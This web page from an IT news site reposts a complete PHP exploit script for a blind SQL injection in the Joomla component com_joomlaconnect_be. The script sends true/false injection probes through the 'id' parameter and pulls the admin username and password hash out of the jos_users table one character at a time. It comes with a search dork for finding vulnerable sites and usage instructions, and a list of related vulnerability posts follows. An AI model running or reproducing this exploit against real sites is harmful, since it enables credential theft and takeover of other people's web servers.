GO IT WORLD | IT TECH | IT NEWS

Test Code

#!/usr/bin/php
  <?php 

ini_set("max_execution_time",0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:   [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] 

[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 

# 

# 

########################################################################### 

'); 

if ($argc > 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url."+and+1=1--")); 

echo "\nExploiting:\n"; 

$w = strlen(file_get_contents($url."+and+1=0--")); 

$t = abs((100-($w/$r*100))); 

echo "Username: "; 

for ($i=1; $i <= 30; $i++) { 

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); 

   if (abs((100-($laenge/$r*100))) > $t-1) { 

      $count = $i; 

      $i = 30; 

   } 

} 

for ($j = 1; $j < $count; $j++) { 

   for ($i = 46; $i <= 122; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 122; 

      } 

   } 

} 

echo "\nPassword: "; 

for ($j = 1; $j <= 49; $j++) { 

   for ($i = 46; $i <= 102; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 102; 

      } 

   } 

} 

} 

?>

Related Posts

• 11/09/2011 -- Outlook vulnerability explain (0)
• 10/02/2011 -- WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability (0)
• 09/15/2011 -- Microsoft Excel Record Integer Signedness Vulnerability (0)
• 08/12/2011 -- CoolPlayer 219 Buffer Overflow Exploit (0)
• 06/23/2011 -- Mozilla Foundation Security Advisory 2011-20 (0)
• 05/26/2010 -- nginx php file parse vulnerability (2)
• 10/03/2009 -- Changetrack 4.3-3 Local Privilege Escalation Vulnerability (0)
• 08/12/2009 -- Please immediately upgrade your wordpress to 2.8.4 (6)
• 07/31/2009 -- NcFTPd <= 2.8.5 Remote Jail Breakout Vulnerability (1)
• 07/22/2009 -- Wordpress Adsense Injection : Randomly Insert Ads in Posts (156)